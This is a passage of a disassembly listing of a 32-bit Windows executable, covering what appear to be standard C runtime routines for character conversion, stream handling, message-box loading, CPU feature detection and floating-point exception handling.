mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_402AEB
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F607
lea eax, [ebp+var_10]
push eax
push 8
push [ebp+arg_0]
call sub_40CDF4
add esp, 0Ch
jmp short loc_40F617
; ---------------------------------------------------------------------------
loc_40F607: ; CODE XREF: sub_40F5D7+1Bj
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
loc_40F617: ; CODE XREF: sub_40F5D7+2Ej
cmp [ebp+var_4], 0
jz short locret_40F624
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F624: ; CODE XREF: sub_40F5D7+44j
leave
retn
sub_40F5D7 endp
; =============== S U B R O U T I N E =======================================
sub_40F626 proc near ; CODE XREF: sub_4091F2+17p
; sub_409217+13Cp ...
arg_0 = dword ptr 4
cmp dword_427940, 0
jnz short loc_40F641
mov eax, [esp+arg_0]
mov ecx, off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
retn
; ---------------------------------------------------------------------------
loc_40F641: ; CODE XREF: sub_40F626+7j
push 0
push [esp+4+arg_0]
call sub_40F5D7
pop ecx
pop ecx
retn
sub_40F626 endp
; =============== S U B R O U T I N E =======================================
sub_40F64F proc near ; CODE XREF: sub_409217+15Ep
; sub_409217+5BEp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
or ebp, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
push edi
jnz loc_40F70C
push esi
call sub_408DD0
cmp eax, ebp
pop ecx
mov ebx, offset dword_423BD0
jz short loc_40F6A2
push esi
call sub_408DD0
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F6A2
push esi
call sub_408DD0
sar eax, 5
push esi
lea edi, ds:435820h[eax*4]
call sub_408DD0
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F6A4
; ---------------------------------------------------------------------------
loc_40F6A2: ; CODE XREF: sub_40F64F+23j
; sub_40F64F+2Fj
mov eax, ebx
loc_40F6A4: ; CODE XREF: sub_40F64F+51j
test byte ptr [eax+24h], 7Fh
jnz short loc_40F6EB
push esi
call sub_408DD0
cmp eax, ebp
pop ecx
jz short loc_40F6E3
push esi
call sub_408DD0
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F6E3
push esi
call sub_408DD0
sar eax, 5
push esi
lea edi, ds:435820h[eax*4]
call sub_408DD0
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F6E5
; ---------------------------------------------------------------------------
loc_40F6E3: ; CODE XREF: sub_40F64F+64j
; sub_40F64F+70j
mov eax, ebx
loc_40F6E5: ; CODE XREF: sub_40F64F+92j
test byte ptr [eax+24h], 80h
jz short loc_40F70C
loc_40F6EB: ; CODE XREF: sub_40F64F+59j
call sub_405B83
xor edi, edi
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
loc_40F705: ; CODE XREF: sub_40F64F+C3j
; sub_40F64F+CEj ...
mov eax, ebp
loc_40F707: ; CODE XREF: sub_40F64F+11Cj
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40F70C: ; CODE XREF: sub_40F64F+Fj
; sub_40F64F+9Aj
mov ebx, [esp+10h+arg_0]
cmp ebx, ebp
jz short loc_40F705
mov eax, [esi+0Ch]
test al, 1
jnz short loc_40F723
test al, al
jns short loc_40F705
test al, 2
jnz short loc_40F705
loc_40F723: ; CODE XREF: sub_40F64F+CAj
xor edi, edi
cmp [esi+8], edi
jnz short loc_40F731
push esi
call sub_40D8AC
pop ecx
loc_40F731: ; CODE XREF: sub_40F64F+D9j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_40F740
cmp [esi+4], edi
jnz short loc_40F705
inc eax
mov [esi], eax
loc_40F740: ; CODE XREF: sub_40F64F+E7j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_40F753
cmp [eax], bl
jz short loc_40F755
inc eax
mov [esi], eax
jmp short loc_40F705
; ---------------------------------------------------------------------------
loc_40F753: ; CODE XREF: sub_40F64F+F9j
mov [eax], bl
loc_40F755: ; CODE XREF: sub_40F64F+FDj
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_40F707
sub_40F64F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F76D proc near ; CODE XREF: sub_409217+6FFp
; sub_40F880+Ep
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_40F791
cmp [ebp+arg_8], ebx
jz short loc_40F791
cmp [esi], bl
jnz short loc_40F797
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F791
mov [eax], bx
loc_40F791: ; CODE XREF: sub_40F76D+Fj
; sub_40F76D+14j ...
xor eax, eax
loc_40F793: ; CODE XREF: sub_40F76D+5Aj
; sub_40F76D+BBj ...
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F797: ; CODE XREF: sub_40F76D+18j
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_402AEB
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_40F7C9
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F7B8
movzx cx, byte ptr [esi]
mov [eax], cx
loc_40F7B8: ; CODE XREF: sub_40F76D+42j
; sub_40F76D+10Bj
cmp [ebp+var_4], bl
jz short loc_40F7C4
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F7C4: ; CODE XREF: sub_40F76D+4Ej
xor eax, eax
inc eax
jmp short loc_40F793
; ---------------------------------------------------------------------------
loc_40F7C9: ; CODE XREF: sub_40F76D+3Bj
lea eax, [ebp+var_10]
push eax
movzx eax, byte ptr [esi]
push eax
call sub_40CDB0
test eax, eax
pop ecx
pop ecx
jz short loc_40F859
mov eax, [ebp+var_10]
mov ecx, [eax+0ACh]
cmp ecx, 1
jle short loc_40F80F
cmp [ebp+arg_8], ecx
jl short loc_40F80F
xor edx, edx
cmp [ebp+arg_0], ebx
setnz dl
push edx
push [ebp+arg_0]
push ecx
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0 ; MultiByteToWideChar
test eax, eax
mov eax, [ebp+var_10]
jnz short loc_40F81F
loc_40F80F: ; CODE XREF: sub_40F76D+7Bj
; sub_40F76D+80j
mov ecx, [ebp+arg_8]
cmp ecx, [eax+0ACh]
jb short loc_40F83A
cmp [esi+1], bl
jz short loc_40F83A
loc_40F81F: ; CODE XREF: sub_40F76D+A0j
cmp [ebp+var_4], bl
mov eax, [eax+0ACh]
jz loc_40F793
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40F793
; ---------------------------------------------------------------------------
loc_40F83A: ; CODE XREF: sub_40F76D+ABj
; sub_40F76D+B0j ...
call sub_405B83
mov dword ptr [eax], 2Ah
cmp [ebp+var_4], bl
jz short loc_40F851
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F851: ; CODE XREF: sub_40F76D+DBj
or eax, 0FFFFFFFFh
jmp loc_40F793
; ---------------------------------------------------------------------------
loc_40F859: ; CODE XREF: sub_40F76D+6Dj
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
mov eax, [ebp+var_10]
push 1
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0 ; MultiByteToWideChar
test eax, eax
jnz loc_40F7B8
jmp short loc_40F83A
sub_40F76D endp
; =============== S U B R O U T I N E =======================================
sub_40F880 proc near ; CODE XREF: sub_40D20A+18Ep
; sub_40D20A+1BCp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40F76D
add esp, 10h
retn
sub_40F880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F8A0 proc near ; CODE XREF: sub_409217+9CFp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_40F8B9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40F8B9: ; CODE XREF: sub_40F8A0+Ej
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_40F8A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F8D4 proc near ; CODE XREF: sub_409E64+15Dp
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40553A
xor ebx, ebx
cmp dword_427FE8, ebx
mov [ebp+var_10], eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
jnz loc_40F9A9
push offset aUser32_dll_0 ; "USER32.DLL"
call ds:off_41D0E4
mov edi, eax
cmp edi, ebx
jnz short loc_40F914
loc_40F90D: ; CODE XREF: sub_40F8D4+50j
xor eax, eax
jmp loc_40FA6D
; ---------------------------------------------------------------------------
loc_40F914: ; CODE XREF: sub_40F8D4+37j
mov esi, ds:off_41D0E8
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; sub_446320
cmp eax, ebx
jz short loc_40F90D
push eax
call sub_4054D7
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov dword_427FE8, eax
call esi ; sub_446320
push eax
call sub_4054D7
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_427FEC, eax
call esi ; sub_446320
push eax
call sub_4054D7
mov dword_427FF0, eax
lea eax, [ebp+var_8]
push eax
call sub_407CB6
test eax, eax
pop ecx
pop ecx
jz short loc_40F977
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403209
add esp, 14h
loc_40F977: ; CODE XREF: sub_40F8D4+94j
cmp [ebp+var_8], 2
jnz short loc_40F9A9
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; sub_446320
push eax
call sub_4054D7
cmp eax, ebx
pop ecx
mov dword_427FF8, eax
jz short loc_40F9A9
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; sub_446320
push eax
call sub_4054D7
pop ecx
mov dword_427FF4, eax
loc_40F9A9: ; CODE XREF: sub_40F8D4+22j
; sub_40F8D4+A7j ...
mov eax, dword_427FF4
mov esi, [ebp+var_10]
cmp eax, esi
jz short loc_40FA22
cmp dword_427FF8, esi
jz short loc_40FA22
push eax
call sub_405543
pop ecx
call eax
cmp eax, ebx
jz short loc_40F9EF
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
push dword_427FF8
call sub_405543
pop ecx
call eax
test eax, eax
jz short loc_40F9EF
test [ebp+var_18], 1
jnz short loc_40FA22
loc_40F9EF: ; CODE XREF: sub_40F8D4+F4j
; sub_40F8D4+113j
lea eax, [ebp+var_C]
push eax
call sub_407CED
test eax, eax
pop ecx
jz short loc_40FA0A
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403209
add esp, 14h
loc_40FA0A: ; CODE XREF: sub_40F8D4+127j
cmp [ebp+var_C], 4
jb short loc_40FA19
or [ebp+arg_8], 200000h
jmp short loc_40FA53
; ---------------------------------------------------------------------------
loc_40FA19: ; CODE XREF: sub_40F8D4+13Aj
or [ebp+arg_8], 40000h
jmp short loc_40FA53
; ---------------------------------------------------------------------------
loc_40FA22: ; CODE XREF: sub_40F8D4+DFj
; sub_40F8D4+E7j ...
mov eax, dword_427FEC
cmp eax, esi
jz short loc_40FA53
push eax
call sub_405543
pop ecx
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40FA53
mov eax, dword_427FF0
cmp eax, esi
jz short loc_40FA53
push [ebp+var_4]
push eax
call sub_405543
pop ecx
call eax
mov [ebp+var_4], eax
loc_40FA53: ; CODE XREF: sub_40F8D4+143j
; sub_40F8D4+14Cj ...
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
push dword_427FE8
call sub_405543
pop ecx
call eax
loc_40FA6D: ; CODE XREF: sub_40F8D4+3Bj
pop edi
pop esi
pop ebx
leave
retn
sub_40F8D4 endp
; =============== S U B R O U T I N E =======================================
sub_40FA72 proc near ; CODE XREF: sub_409E64+27p
; sub_409E64+38p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jl short loc_40FA9B
cmp ecx, 2
jle short loc_40FA8E
cmp ecx, 3
jnz short loc_40FA9B
mov eax, dword_4275FC
pop esi
retn
; ---------------------------------------------------------------------------
loc_40FA8E: ; CODE XREF: sub_40FA72+Ej
mov eax, dword_4275FC
mov dword_4275FC, ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40FA9B: ; CODE XREF: sub_40FA72+9j
; sub_40FA72+13j
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
sub_40FA72 endp
; =============== S U B R O U T I N E =======================================
sub_40FAB8 proc near ; CODE XREF: sub_410107+5Fp
; DATA XREF: sub_40AA2F:loc_40AA71o
xor eax, eax
retn
sub_40FAB8 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_480. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40FABC proc near ; CODE XREF: sub_40FB1Cp
mov eax, offset sub_4116FA
mov off_423F80, eax
mov off_423F84, offset sub_410DF6
mov off_423F88, offset sub_410DB4
mov off_423F8C, offset sub_410DE8
mov off_423F90, offset word_410D5E
mov off_423F94, eax
mov off_423F98, offset sub_411674
mov off_423F9C, offset sub_410D74
mov off_423FA0, offset sub_410CDE
mov off_423FA4, offset sub_410C6D
retn
sub_40FABC endp
; =============== S U B R O U T I N E =======================================
sub_40FB1C proc near ; CODE XREF: sub_407D29+1Cp
; DATA XREF: fabskl8p:off_41EDA4o
arg_0 = dword ptr 4
call sub_40FABC
call sub_411780
cmp [esp+arg_0], 0
mov dword_428000, eax
jz short loc_40FB37
call sub_41171B
loc_40FB37: ; CODE XREF: sub_40FB1C+14j
fnclex
retn
sub_40FB1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB3A proc near ; CODE XREF: sub_40FB8A+4Dp
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421C28
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_40FB7A
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_40FB6F
cmp eax, 0C000001Dh
jz short loc_40FB6F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40FB6F: ; CODE XREF: sub_40FB3A+29j
; sub_40FB3A+30j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and [ebp+var_1C], 0
loc_40FB7A: ; CODE XREF: sub_40FB3A+1Bj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40FB3A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB8A proc near ; CODE XREF: sub_40ACDF+7p sub_40FBEAp
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
push ebx
mov [ebp+var_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_40FBCD
push ecx
popf
xor eax, eax
cpuid
mov [ebp+var_C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, 1
cpuid
mov [ebp+var_4], edx
mov [ebp+var_8], eax
loc_40FBCD: ; CODE XREF: sub_40FB8A+22j
pop ebx
test [ebp+var_4], 4000000h
jz short loc_40FBE5
call sub_40FB3A
test eax, eax
jz short loc_40FBE5
xor eax, eax
inc eax
jmp short loc_40FBE7
; ---------------------------------------------------------------------------
loc_40FBE5: ; CODE XREF: sub_40FB8A+4Bj
; sub_40FB8A+54j
xor eax, eax
loc_40FBE7: ; CODE XREF: sub_40FB8A+59j
pop ebx
leave
retn
sub_40FB8A endp
; =============== S U B R O U T I N E =======================================
sub_40FBEA proc near ; DATA XREF: fabskl8p:0041D2E4o
call sub_40FB8A
mov dword_435800, eax
xor eax, eax
retn
sub_40FBEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FBF7 proc near ; CODE XREF: sub_4101F8+4Ap
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov cl, byte ptr [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
mov [eax+4], edi
mov eax, [ebp+arg_0]
xor ebx, ebx
mov [eax+8], edi
mov eax, [ebp+arg_0]
inc ebx
test cl, 10h
mov [eax+0Ch], edi
jz short loc_40FC29
mov eax, [ebp+arg_0]
or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_40FC29: ; CODE XREF: sub_40FBF7+23j
test cl, 2
jz short loc_40FC3C
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_40FC3C: ; CODE XREF: sub_40FBF7+35j
test cl, bl
jz short loc_40FC4E
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_40FC4E: ; CODE XREF: sub_40FBF7+47j
test cl, 4
jz short loc_40FC61
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_40FC61: ; CODE XREF: sub_40FBF7+5Aj
test cl, 8
jz short loc_40FC74
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_40FC74: ; CODE XREF: sub_40FBF7+6Dj
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
add ecx, ecx
not ecx
xor ecx, [eax+8]
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, 2
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_4103F7
test al, bl
jz short loc_40FCE3
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_40FCE3: ; CODE XREF: sub_40FBF7+E3j
test al, 4
jz short loc_40FCEE
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_40FCEE: ; CODE XREF: sub_40FBF7+EEj
test al, 8
jz short loc_40FCF9
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_40FCF9: ; CODE XREF: sub_40FBF7+F9j
test al, 10h
jz short loc_40FD04
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 2
loc_40FD04: ; CODE XREF: sub_40FBF7+104j
test al, 20h
jz short loc_40FD0E
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_40FD0E: ; CODE XREF: sub_40FBF7+10Fj
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_40FD4E
cmp eax, 400h
jz short loc_40FD42
cmp eax, 800h
jz short loc_40FD33
cmp eax, ecx
jnz short loc_40FD54
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_40FD54
; ---------------------------------------------------------------------------
loc_40FD33: ; CODE XREF: sub_40FBF7+12Ej
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, 2
loc_40FD3E: ; CODE XREF: sub_40FBF7+155j
mov [eax], ecx
jmp short loc_40FD54
; ---------------------------------------------------------------------------
loc_40FD42: ; CODE XREF: sub_40FBF7+127j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
jmp short loc_40FD3E
; ---------------------------------------------------------------------------
loc_40FD4E: ; CODE XREF: sub_40FBF7+120j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_40FD54: ; CODE XREF: sub_40FBF7+132j
; sub_40FBF7+13Aj ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_40FD7F
cmp eax, 200h
jz short loc_40FD72
cmp eax, ecx
jnz short loc_40FD8C
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_40FD8C
; ---------------------------------------------------------------------------
loc_40FD72: ; CODE XREF: sub_40FBF7+16Dj
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_40FD8A
; ---------------------------------------------------------------------------
loc_40FD7F: ; CODE XREF: sub_40FBF7+166j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_40FD8A: ; CODE XREF: sub_40FBF7+186j
mov [eax], ecx
loc_40FD8C: ; CODE XREF: sub_40FBF7+171j
; sub_40FBF7+179j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
cmp [ebp+arg_18], edi
mov eax, [ebp+arg_0]
mov edi, [ebp+arg_14]
jz short loc_40FDD6
and dword ptr [eax+20h], 0FFFFFFE1h
mov eax, [ebp+arg_10]
fld dword ptr [eax]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
and dword ptr [eax+60h], 0FFFFFFE1h
fld dword ptr [edi]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+50h]
jmp short loc_40FE0A
; ---------------------------------------------------------------------------
loc_40FDD6: ; CODE XREF: sub_40FBF7+1B7j
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
loc_40FE0A: ; CODE XREF: sub_40FBF7+1DDj
call sub_410402
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:off_41D1AC
mov ecx, [ebp+arg_0]
test byte ptr [ecx+8], 10h
jz short loc_40FE2B
and dword ptr [esi], 0FFFFFFFEh
loc_40FE2B: ; CODE XREF: sub_40FBF7+22Fj
test byte ptr [ecx+8], 8
jz short loc_40FE34
and dword ptr [esi], 0FFFFFFFBh
loc_40FE34: ; CODE XREF: sub_40FBF7+238j
test byte ptr [ecx+8], 4
jz short loc_40FE3D
and dword ptr [esi], 0FFFFFFF7h
loc_40FE3D: ; CODE XREF: sub_40FBF7+241j
test byte ptr [ecx+8], 2
jz short loc_40FE46
and dword ptr [esi], 0FFFFFFEFh
loc_40FE46: ; CODE XREF: sub_40FBF7+24Aj
test [ecx+8], bl
jz short loc_40FE4E
and dword ptr [esi], 0FFFFFFDFh
loc_40FE4E: ; CODE XREF: sub_40FBF7+252j
mov eax, [ecx]
and eax, 3
xor ebx, ebx
sub eax, ebx
mov edx, 0FFFFF3FFh
jz short loc_40FE8D
dec eax
jz short loc_40FE7F
dec eax
jz short loc_40FE6F
dec eax
jnz short loc_40FE8F
or dword ptr [esi], 0C00h
jmp short loc_40FE8F
; ---------------------------------------------------------------------------
loc_40FE6F: ; CODE XREF: sub_40FBF7+26Bj
mov eax, [esi]
and eax, 0FFFFFBFFh
or eax, 800h
loc_40FE7B: ; CODE XREF: sub_40FBF7+294j
mov [esi], eax
jmp short loc_40FE8F
; ---------------------------------------------------------------------------
loc_40FE7F: ; CODE XREF: sub_40FBF7+268j
mov eax, [esi]
and eax, 0FFFFF7FFh
or eax, 400h
jmp short loc_40FE7B
; ---------------------------------------------------------------------------
loc_40FE8D: ; CODE XREF: sub_40FBF7+265j
and [esi], edx
loc_40FE8F: ; CODE XREF: sub_40FBF7+26Ej
; sub_40FBF7+276j ...
mov eax, [ecx]
shr eax, 2
and eax, 7
sub eax, ebx
jz short loc_40FEB0
dec eax
jz short loc_40FEA5
dec eax
jnz short loc_40FEBB
and [esi], edx
jmp short loc_40FEBB
; ---------------------------------------------------------------------------
loc_40FEA5: ; CODE XREF: sub_40FBF7+2A5j
mov eax, [esi]
and eax, edx
or eax, 200h
jmp short loc_40FEB9
; ---------------------------------------------------------------------------
loc_40FEB0: ; CODE XREF: sub_40FBF7+2A2j
mov eax, [esi]
and eax, edx
or eax, 300h
loc_40FEB9: ; CODE XREF: sub_40FBF7+2B7j
mov [esi], eax
loc_40FEBB: ; CODE XREF: sub_40FBF7+2A8j
; sub_40FBF7+2ACj
cmp [ebp+arg_18], ebx
jz short loc_40FEC7
fld dword ptr [ecx+50h]
fstp dword ptr [edi]
jmp short loc_40FECC
; ---------------------------------------------------------------------------
loc_40FEC7: ; CODE XREF: sub_40FBF7+2C7j
fld qword ptr [ecx+50h]
fstp qword ptr [edi]
loc_40FECC: ; CODE XREF: sub_40FBF7+2CEj
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40FBF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FED1 proc near ; CODE XREF: sub_4101F8+21p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_40FEFF
test byte ptr [ebp+arg_8], bl
jz short loc_40FEFF
push ebx
call sub_410435
pop ecx
and esi, 0FFFFFFF7h
jmp loc_410090
; ---------------------------------------------------------------------------
loc_40FEFF: ; CODE XREF: sub_40FED1+18j
; sub_40FED1+1Dj
test al, 4
jz short loc_40FF19
test byte ptr [ebp+arg_8], 4
jz short loc_40FF19
push 4
call sub_410435
pop ecx
and esi, 0FFFFFFFBh
jmp loc_410090
; ---------------------------------------------------------------------------
loc_40FF19: ; CODE XREF: sub_40FED1+30j
; sub_40FED1+36j
test al, bl
jz loc_40FFBB
test byte ptr [ebp+arg_8], 8
jz loc_40FFBB
push 8
call sub_410435
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz short loc_40FF93
cmp eax, 400h
jz short loc_40FF7D
cmp eax, 800h
jz short loc_40FF67
cmp eax, ecx
jnz short loc_40FFB3
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
fld dbl_4240C8
test ah, 5
jnp short loc_40FFB1
jmp short loc_40FFAF
; ---------------------------------------------------------------------------
loc_40FF67: ; CODE XREF: sub_40FED1+7Aj
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jnp short loc_40FFA1
fld dbl_4240C8
jmp short loc_40FFAF
; ---------------------------------------------------------------------------
loc_40FF7D: ; CODE XREF: sub_40FED1+73j
fldz
mov ecx, [ebp+arg_4]
